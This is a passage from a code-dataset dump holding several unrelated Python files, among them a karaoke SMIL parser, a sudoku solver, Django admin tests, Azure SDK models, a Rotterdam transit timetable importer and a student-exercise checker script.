| code (string, 3-1.05M chars) | repo_name (string, 5-104 chars) | path (string, 4-251 chars) | language (stringclasses: 1 value) | license (stringclasses: 15 values) | size (int64, 3-1.05M) |
---|---|---|---|---|---|
import smallsmilhandler
from xml.sax import make_parser
from xml.sax.handler import ContentHandler
import sys
import re
import json
import urllib.request
class KaraokeLocal:
def Inicializador(self, fichero):
parser = make_parser()
SmilHandler = smallsmilhandler.SmallSMILHandler()
parser.setContentHandler(SmilHandler)
parser.parse(open(fichero))
self.Lista = SmilHandler.get_tags()
return self.Lista
def do_local(self):
Datos = self.__str__()
for Dato in Datos.split("\t"):
if Dato[0:3] == "src":
if Dato[5:12] == "http://":
URL = Dato[5:-1]
nombre = URL[5:].split("/")[-1]
urllib.request.urlretrieve(URL, nombre)
def to_json(self, Nombre="-1"):
if Nombre == "-1":
NombreGuardado = sys.argv[1][:-4] + "json"
else:
NombreGuardado = Nombre
with open(NombreGuardado, 'w') as archivojson:
json.dump(self.Lista, archivojson)
def __str__(self):
string = ""
for etiqueta in self.Lista:
for atributo in etiqueta.keys():
string = string + atributo + "\t"
for key in etiqueta[atributo]:
if key[-3:] != '=""':
string = string + key + "\t"
string = string[:-1] + "\n"
return string
if __name__ == "__main__":
Karaoke = KaraokeLocal()
try:
Karaoke.Inicializador(sys.argv[1])
except:
print('Usage: python karaoke.py file.smil')
raise SystemExit
StringEtiquetas = Karaoke.__str__()
print(StringEtiquetas)
Karaoke.to_json()
Karaoke.do_local()
Karaoke.to_json("Local.json")
StringEtiquetas = Karaoke.__str__()
print(StringEtiquetas)
| DanielBarreno/ptavi-p3 | karaoke.py | Python | apache-2.0 | 1,836 |
"""
Code Sources Used:
https://github.com/gioGats/sudoku
http://norvig.com/sudoku.html
"""
import itertools
import sys
import time
import generate_sudoku as gs
# TODO Rewrite definite_fill and indefinite_fill into new functions: update_possible, fill_definite, indefinite_fill
# TODO modify indefinite_fill. BFS testing each node with update_possible+fill_definite combo.
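# Illustrative sketch (not part of the original solver): Puzzle.solve below enumerates
# candidate assignments for the empty cells as a Cartesian product of each cell's
# possible values and consumes it in slices of 1000 via brute_gen. The uncalled helper
# below demonstrates that islice/product chunking pattern on made-up candidate lists.
def _chunked_product_demo():
    candidates = [['1', '2'], ['3', '4'], ['5']]  # hypothetical per-cell candidates
    for start in range(0, 4, 2):  # walk the 4 combinations two at a time
        chunk = list(itertools.islice(itertools.product(*candidates), start, start + 2))
        print(chunk)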
class Puzzle(object):
def __init__(self, string=None):
assert isinstance(string, str) or string is None
if string is None:
raise NotImplementedError("Random generation not enabled")
else:
self.cell_values = gs.grid_values(string)
self.digits = '123456789'
self.rows = 'ABCDEFGHI'
self.cols = self.digits
self.puzzle_string = ''
def solve(self):
editable_ids = []
for cell_id in self.cell_values:
if self.cell_values[cell_id] == '0':
editable_ids.append(cell_id)
brute_dict = self.get_possible_values(editable_ids)
brute_list = []
brute_list_ids = []
for value in brute_dict.keys():
brute_list_ids.append(str(value))
brute_list.append(list(brute_dict[str(value)]))
for i in range(0, 1000000000, 1000):
if self.brute_gen(brute_list, brute_list_ids, start=0 + i, end=1000 + i):
results = self.cell_values
for r in self.rows:
self.puzzle_string += (''.join(results[r + c] for c in self.cols))
gs.display(self.cell_values)
print('///////////////////')
return self.puzzle_string
print('Options Exhausted')
print('///////////////////')
def get_possible_values(self, values):
values_dict = {}
for i in range(0, len(values), 1):
possible_values = set()
for value in list(self.valid_fill(values[i])):
possible_values.add(str(value))
else:
values_dict[str(values[i])] = possible_values
return values_dict
def brute_gen(self, brute_list, brute_list_ids, start, end):
brute_gen1000 = list(itertools.islice(itertools.product(*brute_list), start, end, 1))
for sequence in brute_gen1000:
send_sequence = list(sequence)
valid_result = self.brute_fill(brute_list_ids, send_sequence)
if valid_result:
return True
else:
for rollback_id in brute_list_ids:
self.cell_values[rollback_id] = '0'
# Keith's WIP Zone: UNDER CONSTRUCTION #################################################################################
'''
def help_brute_fill(self, cell_id, possible_values):
possible_values = list(possible_values)
for i in range(0, len(possible_values), 1):
if self.is_valid(cell_id, possible_values[i]):
self.self.cell_values[cell_id] = possible_values[i]
return 'Set' '''
def valid_fill(self, cell_id):
possible_numbers = list(range(1, 10))
# ISSUE: This loop is very brash. It works, but it could work better.
# noinspection PyUnusedLocal
for n in list(range(3)):
for number in possible_numbers:
if str(number) in (self.cell_values[cell_id2] for cell_id2 in gs.units[cell_id][0]):
possible_numbers.remove(number)
elif str(number) in (self.cell_values[cell_id2] for cell_id2 in gs.units[cell_id][1]):
possible_numbers.remove(number)
elif str(number) in (self.cell_values[cell_id2] for cell_id2 in gs.units[cell_id][2]):
possible_numbers.remove(number)
return ''.join(map(str, possible_numbers))
def brute_fill(self, cell_ids, cell_values):
for i in range(0, len(cell_ids), 1):
self.cell_values[cell_ids[i]] = str(cell_values[i])
for i in range(0, len(cell_ids), 1):
if self.is_valid(cell_ids[i], cell_values[i]):
return True
else:
return False
def is_valid(self, cell_id, cell_value):
peer_cols = gs.units[cell_id][0]
peer_rows = gs.units[cell_id][1]
peer_boxs = gs.units[cell_id][2]
peer_cols.remove(cell_id)
peer_rows.remove(cell_id)
peer_boxs.remove(cell_id)
# input('?')
for cell_id2 in peer_cols:
if self.cell_values[cell_id] == self.cell_values[cell_id2]:
peer_cols.append(cell_id)
peer_rows.append(cell_id)
peer_boxs.append(cell_id)
return False
for cell_id2 in peer_rows:
if self.cell_values[cell_id] == self.cell_values[cell_id2]:
peer_cols.append(cell_id)
peer_rows.append(cell_id)
peer_boxs.append(cell_id)
return False
for cell_id2 in peer_boxs:
if self.cell_values[cell_id] == self.cell_values[cell_id2]:
peer_cols.append(cell_id)
peer_rows.append(cell_id)
peer_boxs.append(cell_id)
return False
peer_cols.append(cell_id)
peer_rows.append(cell_id)
peer_boxs.append(cell_id)
return True
# UNDER CONSTRUCTION ###################################################################################################
if __name__ == '__main__':
f = open('failures.txt', 'w')
try:
num_examples = int(sys.argv[1])
except IndexError:
num_examples = 100 # Default
# Effective Range: 17-77
print('Generating...')
gs.generate_puzzles(1, 55, 'data/sudoku.txt')
print('Testing brute force, %d examples' % num_examples)
# FUTURE Add random sampling from complete csv
examples = []
sf = open('data/sudoku.txt', 'r').read().replace(',', '').splitlines()
for i in range(0, len(sf), 2):
examples.append([sf[i], sf[i + 1]])
examples.reverse()
global_start = time.time()
trial = success = fail = 0
try:
for ex in examples:
local_start = time.time()
trial += 1
start = ex[0]
solution = ex[1]
puzzle = Puzzle(start)
print("Trial %d of %d:\n" % (trial, num_examples))
puzzle = puzzle.solve()
local_end = time.time()
if puzzle == solution:
print(' success in %.10f seconds' % (local_end - local_start))
success += 1
else:
print(' failure in %.10f seconds' % (local_end - local_start))
# f.write(puzzle.__repr__() + '\n')
fail += 1
raise KeyboardInterrupt
except KeyboardInterrupt:
global_end = time.time()
print('Testing complete in %.10f seconds' % (global_end - global_start))
print('%d successes and %d failures in %d trials' % (success, fail, trial))
f.close()
| gioGats/sudoku | v0.1/brute_force.py | Python | gpl-3.0 | 7,084 |
# Copyright 2018 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Data class for orders.
"""
from dataclasses import dataclass
from typing import List
@dataclass
class Shipping:
"""
Data class for shipping information.
"""
address_1: str
address_2: str
city: str
state: str
zip_code: str
email: str
mobile: str
@staticmethod
def deserialize(data):
"""
Helper function for parsing a dict of shipping data to a Shipping object.
Parameters:
data (dict): A dict of shipping data.
Output:
A Shipping object.
"""
if data:
return Shipping(
address_1=data.get('address_1'),
address_2=data.get('address_2'),
city=data.get('city'),
state=data.get('state'),
zip_code=data.get('zip_code'),
email=data.get('email'),
mobile=data.get('mobile')
)
return None
@dataclass
class Order:
"""
Data class for orders.
"""
amount: float
shipping: Shipping
status: str
items: List[str]
id: str = None
@staticmethod
def deserialize(document):
"""
Helper function for parsing a Firestore document to an Order object.
Parameters:
document (DocumentSnapshot): A snapshot of Firestore document.
Output:
An Order object.
"""
data = document.to_dict()
if data:
return Order(
id=document.id,
amount=data.get('amount'),
shipping=Shipping.deserialize(data.get('shipping')),
status=data.get('status'),
items=data.get('items')
)
return None
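# Illustrative usage sketch (hypothetical field values, not part of the original module):
# Shipping.deserialize maps a plain dict straight to a Shipping instance; Order.deserialize
# follows the same pattern but expects a Firestore DocumentSnapshot, so it is not shown here.
def _example_shipping_deserialize():
    data = {
        'address_1': '123 Main St',
        'address_2': '',
        'city': 'Springfield',
        'state': 'OR',
        'zip_code': '97477',
        'email': 'shopper@example.com',
        'mobile': '555-0100',
    }
    return Shipping.deserialize(data)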
| GoogleCloudPlatform/serverless-store-demo | app/helpers/orders/data_classes.py | Python | apache-2.0 | 2,324 |
# -*- coding: utf-8 -*-
import json
from unittest import mock
from pyquery import PyQuery as pq
from olympia import amo
from olympia.access.models import Group, GroupUser
from olympia.amo.tests import TestCase, user_factory
from olympia.amo.urlresolvers import reverse
from olympia.files.models import File
from olympia.users.models import UserProfile
from olympia.versions.models import Version
class TestHomeAndIndex(TestCase):
fixtures = ['base/users']
def setUp(self):
super(TestHomeAndIndex, self).setUp()
self.client.login(email='[email protected]')
def test_get_home(self):
url = reverse('admin:index')
response = self.client.get(url, follow=True)
assert response.status_code == 200
assert response.context['user'].username == 'admin'
assert response.context['user'].email == '[email protected]'
def test_django_index(self):
# Can access with full admin.
url = reverse('admin:index')
response = self.client.get(url)
assert response.status_code == 200
doc = pq(response.content)
modules = [x.text for x in doc('a.section')]
assert len(modules) == 20 # Increment as we add new admin modules.
# Redirected because no permissions if not logged in.
self.client.logout()
response = self.client.get(url)
self.assert3xx(response, '/admin/models/login/?'
'next=/en-US/admin/models/')
# Redirected when logged in without enough permissions.
user = user_factory(username='staffperson', email='[email protected]')
self.client.login(email=user.email)
response = self.client.get(url)
self.assert3xx(response, '/admin/models/login/?'
'next=/en-US/admin/models/')
# Can access with a "is_staff" user.
user.update(email='[email protected]')
self.client.login(email=user.email)
response = self.client.get(url)
assert response.status_code == 200
doc = pq(response.content)
modules = [x.text for x in doc('a.section')]
# Admin:Something doesn't give access to anything, so they can log in
# but they don't see any modules.
assert len(modules) == 0
@mock.patch('olympia.accounts.utils.default_fxa_login_url')
def test_django_login_page(self, default_fxa_login_url):
login_url = 'https://example.com/fxalogin'
default_fxa_login_url.return_value = login_url
# Check we can actually access the /login page - django admin uses it.
url = reverse('admin:login')
response = self.client.get(url)
# if you're already logged in, redirect to the index
self.assert3xx(response, '/en-US/admin/models/')
# Redirected to fxa because no permissions if not logged in.
self.client.logout()
response = self.client.get(url)
self.assert3xx(response, login_url)
# But if logged in and not enough permissions return a 403.
user = user_factory(username='staffperson', email='[email protected]')
self.client.login(email=user.email)
response = self.client.get(url)
assert response.status_code == 403
# But can access with a "is_staff" user.
user.update(email='[email protected]')
response = self.client.get(url)
self.assert3xx(response, '/en-US/admin/models/')
@mock.patch('olympia.accounts.utils.default_fxa_login_url')
def test_django_login_page_with_next(self, default_fxa_login_url):
login_url = 'https://example.com/fxalogin'
default_fxa_login_url.return_value = login_url
# if django admin passes on a next param, check we use it.
url = reverse('admin:login') + '?next=/en-US/admin/models/addon/'
response = self.client.get(url)
# redirect to the correct page
self.assert3xx(response, '/en-US/admin/models/addon/')
# Same with an "is_staff" user.
user = user_factory(email='[email protected]')
self.client.login(email=user.email)
response = self.client.get(url)
self.assert3xx(response, '/en-US/admin/models/addon/')
def test_django_admin_logout(self):
url = reverse('admin:logout')
response = self.client.get(url, follow=False)
self.assert3xx(response, '/', status_code=302)
class TestRecalculateHash(TestCase):
fixtures = ['base/addon_3615', 'base/users']
def setUp(self):
super().setUp()
self.client.login(email='[email protected]')
@mock.patch.object(File, 'file_path',
amo.tests.AMOPaths().file_fixture_path(
'delicious_bookmarks-2.1.106-fx.xpi'))
def test_regenerate_hash(self):
version = Version.objects.create(addon_id=3615)
file = File.objects.create(
filename='delicious_bookmarks-2.1.106-fx.xpi', version=version)
r = self.client.post(reverse('zadmin.recalc_hash', args=[file.id]))
assert json.loads(r.content)[u'success'] == 1
file = File.objects.get(pk=file.id)
assert file.size, 'File size should not be zero'
assert file.hash, 'File hash should not be empty'
@mock.patch.object(File, 'file_path',
amo.tests.AMOPaths().file_fixture_path(
'delicious_bookmarks-2.1.106-fx.xpi'))
def test_regenerate_hash_get(self):
""" Don't allow GET """
version = Version.objects.create(addon_id=3615)
file = File.objects.create(
filename='delicious_bookmarks-2.1.106-fx.xpi', version=version)
r = self.client.get(reverse('zadmin.recalc_hash', args=[file.id]))
assert r.status_code == 405 # GET out of here
class TestPerms(TestCase):
fixtures = ['base/users']
FILE_ID = '1234567890abcdef1234567890abcdef'
def assert_status(self, view, status, follow=False, **kw):
"""Check that requesting the named view returns the expected status."""
assert self.client.get(
reverse(view, kwargs=kw), follow=follow).status_code == status
def test_admin_user(self):
# Admin should see views with Django's perm decorator and our own.
assert self.client.login(email='[email protected]')
self.assert_status('admin:index', 200, follow=True)
def test_staff_user(self):
# Staff users have some privileges.
user = UserProfile.objects.get(email='[email protected]')
group = Group.objects.create(name='Staff', rules='Admin:*')
GroupUser.objects.create(group=group, user=user)
assert self.client.login(email='[email protected]')
self.assert_status('admin:index', 200, follow=True)
def test_unprivileged_user(self):
# Unprivileged user.
assert self.client.login(email='[email protected]')
self.assert_status('admin:index', 403, follow=True)
# Anonymous users should get a login redirect.
self.client.logout()
self.assert3xx(
self.client.get(reverse('admin:index')),
'/admin/models/login/?next=/en-US/admin/models/')
| eviljeff/olympia | src/olympia/zadmin/tests/test_views.py | Python | bsd-3-clause | 7,199 |
from rest_framework import serializers
from ..upload_handling.serializers import ArticleImageSerializer
class ArticleSerializer(serializers.Serializer):
main_title = serializers.CharField(max_length=255)
sub_title = serializers.CharField(max_length=255)
author = serializers.CharField(max_length=255)
image = ArticleImageSerializer()
date = serializers.CharField(max_length=40)
text = serializers.CharField()
| REBradley/WineArb | winearb/articles/serializers.py | Python | bsd-3-clause | 435 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import msrest.serialization
class StsTokenResponseMessage(msrest.serialization.Model):
"""Represents a token response message from the STS service.
All required parameters must be populated in order to send to Azure.
:param access_token: Required. An access token for the account.
:type access_token: str
"""
_validation = {
'access_token': {'required': True},
}
_attribute_map = {
'access_token': {'key': 'AccessToken', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(StsTokenResponseMessage, self).__init__(**kwargs)
self.access_token = kwargs['access_token']
class TokenRequestOptions(msrest.serialization.Model):
"""Parameter group.
:param client_request_id: The client request correlation vector, which should be set to a new
value for each request. Useful when debugging with Microsoft.
:type client_request_id: str
"""
_attribute_map = {
'client_request_id': {'key': 'clientRequestId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(TokenRequestOptions, self).__init__(**kwargs)
self.client_request_id = kwargs.get('client_request_id', None)
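# Illustrative construction sketch (hypothetical values; not part of the generated code,
# which is normally consumed through the generated client operations):
def _example_model_usage():
    token = StsTokenResponseMessage(access_token='example-access-token')
    options = TokenRequestOptions(client_request_id='00000000-0000-0000-0000-000000000000')
    return token.access_token, options.client_request_id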
| Azure/azure-sdk-for-python | sdk/mixedreality/azure-mixedreality-authentication/azure/mixedreality/authentication/_generated/models/_models.py | Python | mit | 1,715 |
from kv1_811 import *
from inserter import insert,version_imported,reject,setRefsDict,simple_dict_insert
from bs4 import BeautifulSoup
import urllib2
from datetime import datetime,timedelta
import logging
from settings.const import *
logger = logging.getLogger("importer")
getPool = getFakePool811
def getDataSource():
return { '1' : {
'operator_id' : 'RET',
'name' : 'RET KV1',
'description' : 'RET KV1 leveringen',
'email' : None,
'url' : None}}
def getOperator():
return { 'RET' : {'privatecode' : 'RET',
'operator_id' : 'RET',
'name' : 'RET',
'phone' : '0900-5006010',
'url' : 'http://www.ret.nl',
'timezone' : 'Europe/Amsterdam',
'language' : 'nl'}
}
def setLineColors():
conn = psycopg2.connect(database_connect)
cur = conn.cursor()
cur.execute("""
UPDATE line set color_shield = '00b43f', color_text= 'ffffff' WHERE operator_id = 'RET:M006';
UPDATE line set color_shield = 'ffdd00', color_text= '000000' WHERE operator_id = 'RET:M007';
UPDATE line set color_shield = 'e32119', color_text= '000000' WHERE operator_id = 'RET:M008';
UPDATE line set color_shield = '003a8c', color_text= 'ffffff' WHERE operator_id = 'RET:M010';
UPDATE line set color_shield = '34b4e4', color_text= '000000' WHERE operator_id = 'RET:M009';
""")
cur.close()
conn.commit()
conn.close()
def recycle_journeyids(conn,data):
cur = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
cur.execute("""
create temporary table NewJourney(
id bigserial primary key NOT NULL,
privatecode varchar(255) NOT NULL,
operator_id varchar(255) NOT NULL,
availabilityconditionRef integer NOT NULL,
journeypatternref integer NOT NULL,
timedemandgroupref integer NOT NULL,
productCategoryRef integer,
noticeassignmentRef integer,
departuretime integer,
blockref varchar(255),
name varchar(255),
lowfloor boolean,
hasLiftOrRamp boolean,
haswifi boolean,
bicycleAllowed boolean,
onDemand boolean,
isvirtual boolean default(false)
);
""")
for key,journey in data['JOURNEY'].items():
journey = deepcopy(journey)
setRefsDict(journey,data['AVAILABILITYCONDITION'],'availabilityconditionref')
setRefsDict(journey,data['JOURNEYPATTERN'],'journeypatternref')
setRefsDict(journey,data['TIMEDEMANDGROUP'],'timedemandgroupref')
setRefsDict(journey,data['NOTICEASSIGNMENT'],'noticeassignmentref',ignore_null=True)
setRefsDict(journey,data['PRODUCTCATEGORY'],'productcategoryref')
exists,id = simple_dict_insert(conn,'NEWJOURNEY',journey,check_existing=False,return_id=True)
cur.execute("""
SELECT jn.operator_id,jo.id,jn.id as tmp_id
FROM
journey as jo,newjourney as jn
WHERE
jo.departuretime = jn.departuretime AND
jo.privatecode = jn.privatecode AND
jo.availabilityconditionref NOT IN (SELECT DISTINCT availabilityconditionref FROM availabilityconditionday WHERE isavailable = true)
""")
for row in cur.fetchall():
data['JOURNEY'][row['operator_id']]['id'] = row['id']
cur.execute("delete from newjourney where id = %s",[row['tmp_id']])
cur.execute("delete from journeytransfers where journeyref = %s or onwardjourneyref = %s",[row['id']]*2)
def generatePool(conn):
cur = conn.cursor()
cur.execute("""
CREATE TEMPORARY TABLE temp_pool as (
SELECT dataownercode,userstopcodebegin,userstopcodeend,transporttype,row_number() OVER (PARTITION BY
dataownercode,userstopcodebegin,userstopcodeend,transporttype ORDER BY index) as index,locationx_ew,locationy_ns
FROM
((SELECT DISTINCT ON (userstopcodebegin,userstopcodeend,transporttype)
dataownercode,userstopcodebegin,userstopcodeend,transporttype,0 as index,locationx_ew,locationy_ns
FROM pool JOIN point using (version,dataownercode,pointcode)
ORDER BY userstopcodebegin,userstopcodeend,transporttype,distancesincestartoflink ASC)
UNION
(SELECT DISTINCT ON (userstopcodebegin,userstopcodeend,transporttype)
dataownercode,userstopcodebegin,userstopcodeend,transporttype,99999 as index,locationx_ew,locationy_ns
FROM pool JOIN point using (version,dataownercode,pointcode)
ORDER BY userstopcodebegin,userstopcodeend,transporttype,distancesincestartoflink DESC)
UNION
SELECT dataownercode,userstopcodebegin,userstopcodeend,transporttype,(dp).path[1] as index,st_x((dp).geom)::integer as
locationx_ew,st_y((dp).geom)::integer as locationy_ns
FROM
(SELECT dataownercode,userstopcodebegin,userstopcodeend,transporttype,st_dumppoints(geom) as dp FROM ret_pool_geom) as x) as pool
ORDER BY dataownercode,userstopcodebegin,userstopcodeend,transporttype,index);
DELETE FROM temp_pool WHERE userstopcodebegin||':'||userstopcodeend||':'||transporttype NOT in (SELECT DISTINCT
userstopcodebegin||':'||userstopcodeend||':'||transporttype FROM ret_pool_geom);
INSERT INTO POINT (
SELECT DISTINCT ON (locationx_ew,locationy_ns)
'POINT',1,'I' as implicit,'RET','OG'||row_number() OVER (ORDER BY locationx_ew,locationy_ns),current_date as validfrom,'PL' as pointtype,'RD' as
coordinatesystemtype,locationx_ew,locationy_ns,0 as locationz, NULL as description
FROM
temp_pool where locationx_ew||':'||locationy_ns not in (select distinct locationx_ew||':'||locationy_ns from point where version = 1)
);
DELETE FROM pool WHERE userstopcodebegin||':'||userstopcodeend||':'||transporttype in (SELECT DISTINCT
userstopcodebegin||':'||userstopcodeend||':'||transporttype FROM temp_pool) and version = 1;
INSERT INTO pool(
SELECT DISTINCT ON (version, dataownercode, userstopcodebegin, userstopcodeend, linkvalidfrom, pointcode, transporttype)
'POOL',l.version,'I',p.dataownercode,p.userstopcodebegin,p.userstopcodeend,l.validfrom as linkvalidfrom,p.dataownercode,pt.pointcode,
SUM(coalesce(st_distance(st_setsrid(st_makepoint(p.locationx_ew,p.locationy_ns),28992),st_setsrid(st_makepoint(prev.locationx_ew,prev.locationy_ns),28992))::integer,0))
OVER (PARTITION BY l.version,p.dataownercode,p.userstopcodebegin,p.userstopcodeend,p.transporttype
ORDER BY p.index
ROWS between UNBOUNDED PRECEDING and 0 PRECEDING) as distancesincestartoflink,
NULL as sgementspeed,NULL as localpointspeed,NULL as description,p.transporttype
FROM
temp_pool as p JOIN link as l USING (dataownercode,userstopcodebegin,userstopcodeend,transporttype)
JOIN (SELECT DISTINCT ON (version,locationx_ew,locationy_ns) version,locationx_ew,locationy_ns,pointcode
FROM POINT ) AS pt USING (locationx_ew,locationy_ns)
LEFT JOIN temp_pool as prev ON (p.index = prev.index +1 AND p.transporttype = prev.transporttype
AND p.userstopcodebegin = prev.userstopcodebegin AND p.userstopcodeend = prev.userstopcodeend));
""")
def getMergeStrategies(conn):
cur = conn.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
cur.execute("""
SELECT 'DATASOURCE' as type,'1' as datasourceref,min(validdate) as fromdate FROM operday GROUP BY dataownercode
""")
rows = cur.fetchall()
cur.close()
return rows
def fixBob(conn):
cur = conn.cursor()
cur.execute("""
update line set linepublicnumber = 'B'||linepublicnumber,linename = 'B'||linename where cast(linepublicnumber as integer) < 20 and transporttype = 'BUS';""")
cur.close()
def cleanDest(conn):
cur = conn.cursor()
cur.execute("""
UPDATE dest SET destnamefull = replace(destnamefull,'A ','') WHERE destnamefull like 'A %';
UPDATE dest SET destnamefull = replace(destnamefull,'B ','') WHERE destnamefull like 'B %';
UPDATE dest SET destnamefull = replace(destnamefull,'C ','') WHERE destnamefull like 'C %';
UPDATE dest SET destnamefull = replace(destnamefull,'D ','') WHERE destnamefull like 'D %';
UPDATE dest SET destnamefull = replace(destnamefull,'E ','') WHERE destnamefull like 'E %';
UPDATE dest SET destnamemain = replace(destnamemain,'A ','') WHERE destnamemain like 'A %';
UPDATE dest SET destnamemain = replace(destnamemain,'B ','') WHERE destnamemain like 'B %';
UPDATE dest SET destnamemain = replace(destnamemain,'C ','') WHERE destnamemain like 'C %';
UPDATE dest SET destnamemain = replace(destnamemain,'D ','') WHERE destnamemain like 'D %';
UPDATE dest SET destnamemain = replace(destnamemain,'E ','') WHERE destnamemain like 'E %';
""")
cur.close()
def import_zip(path,filename,version):
meta,conn = load(path,filename)
if datetime.strptime(meta['enddate'].replace('-',''),'%Y%m%d') < (datetime.now() - timedelta(days=1)):
data = {}
data['DATASOURCE'] = getDataSource()
data['VERSION'] = {}
data['VERSION']['1'] = {'privatecode' : 'RET:'+filename,
'datasourceref' : '1',
'operator_id' : 'RET:'+filename,
'startdate' : meta['startdate'],
'enddate' : meta['enddate'],
'error' : 'ALREADY_EXPIRED',
'description' : filename}
logger.info('Reject '+filename+'\n'+str(data['VERSION']['1']))
reject(data)
conn.commit()
conn.close()
return
try:
fixBob(conn)
cleanDest(conn)
generatePool(conn)
data = {}
data['OPERATOR'] = getOperator()
data['MERGESTRATEGY'] = getMergeStrategies(conn)
data['DATASOURCE'] = getDataSource()
data['VERSION'] = {}
data['VERSION']['1'] = {'privatecode' : 'RET:'+filename,
'datasourceref' : '1',
'operator_id' : 'RET:'+filename,
'startdate' : meta['startdate'],
'enddate' : meta['enddate'],
'description' : filename}
data['DESTINATIONDISPLAY'] = getDestinationDisplays(conn)
data['LINE'] = getLineWithGeneratedNames(conn)
data['STOPPOINT'] = getStopPoints(conn)
data['STOPAREA'] = getStopAreas(conn)
data['AVAILABILITYCONDITION'] = getAvailabilityConditionsUsingOperday(conn)
data['PRODUCTCATEGORY'] = getBISONproductcategories()
data['ADMINISTRATIVEZONE'] = getAdministrativeZones(conn)
timedemandGroupRefForJourney,data['TIMEDEMANDGROUP'] = calculateTimeDemandGroups(conn)
routeRefForPattern,data['ROUTE'] = clusterPatternsIntoRoute(conn,getPool811)
data['JOURNEYPATTERN'] = getJourneyPatterns(routeRefForPattern,conn,data['ROUTE'])
data['JOURNEY'] = getJourneys(timedemandGroupRefForJourney,conn)
data['NOTICEASSIGNMENT'] = {}
data['NOTICE'] = {}
data['NOTICEGROUP'] = {}
insert(data,recycle_journeyids=recycle_journeyids)
conn.close()
setLineColors()
except:
raise
def download(url,filename):
u = urllib2.urlopen(url)
f = open('/tmp/'+filename, 'wb')
meta = u.info()
file_size = int(meta.getheaders("Content-Length")[0])
print "Downloading: %s Bytes: %s" % (filename, file_size)
file_size_dl = 0
block_sz = 8192
while True:
buffer = u.read(block_sz)
if not buffer:
break
file_size_dl += len(buffer)
f.write(buffer)
status = r"%10d [%3.2f%%]" % (file_size_dl, file_size_dl * 100. / file_size)
status = status + chr(8)*(len(status)+1)
print status,
print
f.close()
import_zip('/tmp',filename,None)
url = 'http://data.ndovloket.nl/RET/'
def sync():
f = urllib2.urlopen(url+'?order=d')
soup = BeautifulSoup(f.read())
for link in soup.find_all('a'):
link = link.get('href')
filename = urllib2.unquote(link)
if '.zip' in link.lower():
if not version_imported('RET:'+filename):
try:
logger.info('Importing :'+filename)
download(url+link,filename)
except Exception as e:
logger.error(filename,exc_info=True)
pass
| bliksemlabs/bliksemintegration | importers/ret.py | Python | bsd-2-clause | 12,326 |
# Python3
# Restricted modification area
def fixResult(result):
def fix(x):
return x // 10
return list(map(fix, result))
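# Minimal usage sketch (hypothetical input values, not from the challenge statement):
if __name__ == '__main__':
    print(fixResult([580, 1229, 315]))  # expected output: [58, 122, 31]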
| RevansChen/online-judge | Codefights/arcade/python-arcade/level-6/36.Fix-Result/Python/solution1.py | Python | mit | 132 |
"""
The downloader main module.
It creates a GUI window with the help of the Mypanel class.
It imports:
 - wx
 - Mypanel from class_Mypanel
"""
"""Required modules"""
import wx
from class_Mypanel import Mypanel
#----------------------------------------------------------------------
def main():
'''
The main function which creates the window and box objects and uses
Mypanel class for creating widgets and binding events.
'''
app = wx.App()
#window object
win = wx.Frame(None,title = "SJdownloader",size=(575,420))
#box object
bkg = wx.Panel(win)
#packing the box
Mypanel(bkg,win)
#show the window
win.Show()
#execute the loop for maintaining the window
app.MainLoop()
#----------------------------------------------------------------------
if __name__ == '__main__':
main()
| curioswati/SJdownloader | sjdownloader/SJdownloader.py | Python | isc | 985 |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
Script to check the exercise submission.
To run it, from the shell:
$ python check.py login_github
"""
import os
import random
import sys
ejercicio = 'X-Serv-16.4-contentPostApp'
student_files = []
repo_files = [
'contentapp.py',
'webapp.py',
'check.py',
'README.md',
'.gitignore',
'.git',
'LICENSE'
]
files = student_files + repo_files
if len(sys.argv) != 2:
print()
sys.exit("Usage: $ python check.py login_github")
repo_git = "http://github.com/" + sys.argv[1] + "/" + ejercicio
aleatorio = str(int(random.random() * 1000000))
error = 0
print()
print("Clonando el repositorio " + repo_git + "\n")
os.system('git clone ' + repo_git + ' /tmp/' + aleatorio + ' > /dev/null 2>&1')
try:
github_file_list = os.listdir('/tmp/' + aleatorio)
except OSError:
error = 1
print("Error: No se ha podido acceder al repositorio " + repo_git + ".")
print()
sys.exit()
if len(github_file_list) != len(files):
error = 1
print("Error: número de ficheros en el repositorio incorrecto")
for filename in files:
if filename not in github_file_list:
error = 1
print("\tError: " + filename + " no encontrado en el repositorio.")
if not error:
print("Parece que la entrega se ha realizado bien.")
print()
print("La salida de pep8 es: (si todo va bien, no ha de mostrar nada)")
print()
for filename in student_files:
if filename in github_file_list:
os.system('pep8 --repeat --show-source --statistics /tmp/'
+ aleatorio + '/' + filename)
else:
print("Fichero " + filename + " no encontrado en el repositorio.")
print()
| CursosWeb/X-Serv-16.4-contentPostApp | check.py | Python | gpl-2.0 | 1,710 |
from deeplink import *
from google_apps import *
from salesforce import *
from signing import *
from views import *
| anentropic/django-saml2-idp | saml2idp/tests/__init__.py | Python | mit | 116 |
import datetime
import mock
from django.test import TestCase
from comics.aggregator import command
from comics.aggregator.crawler import CrawlerRelease
from comics.aggregator.exceptions import ComicsError
from comics.core.models import Comic
def create_comics():
Comic.objects.create(slug='xkcd')
Comic.objects.create(slug='sinfest')
class AggregatorConfigTestCase(TestCase):
def setUp(self):
create_comics()
self.cc = command.AggregatorConfig()
def test_init(self):
self.assertEquals(0, len(self.cc.comics))
self.assertEquals(None, self.cc.from_date)
self.assertEquals(None, self.cc.to_date)
def test_init_invalid(self):
self.assertRaises(
AttributeError, command.AggregatorConfig, options=True)
def test_set_from_date(self):
from_date = datetime.date(2008, 3, 11)
self.cc._set_from_date(from_date)
self.assertEquals(from_date, self.cc.from_date)
def test_set_from_date_from_string(self):
from_date = datetime.date(2008, 3, 11)
self.cc._set_from_date(str(from_date))
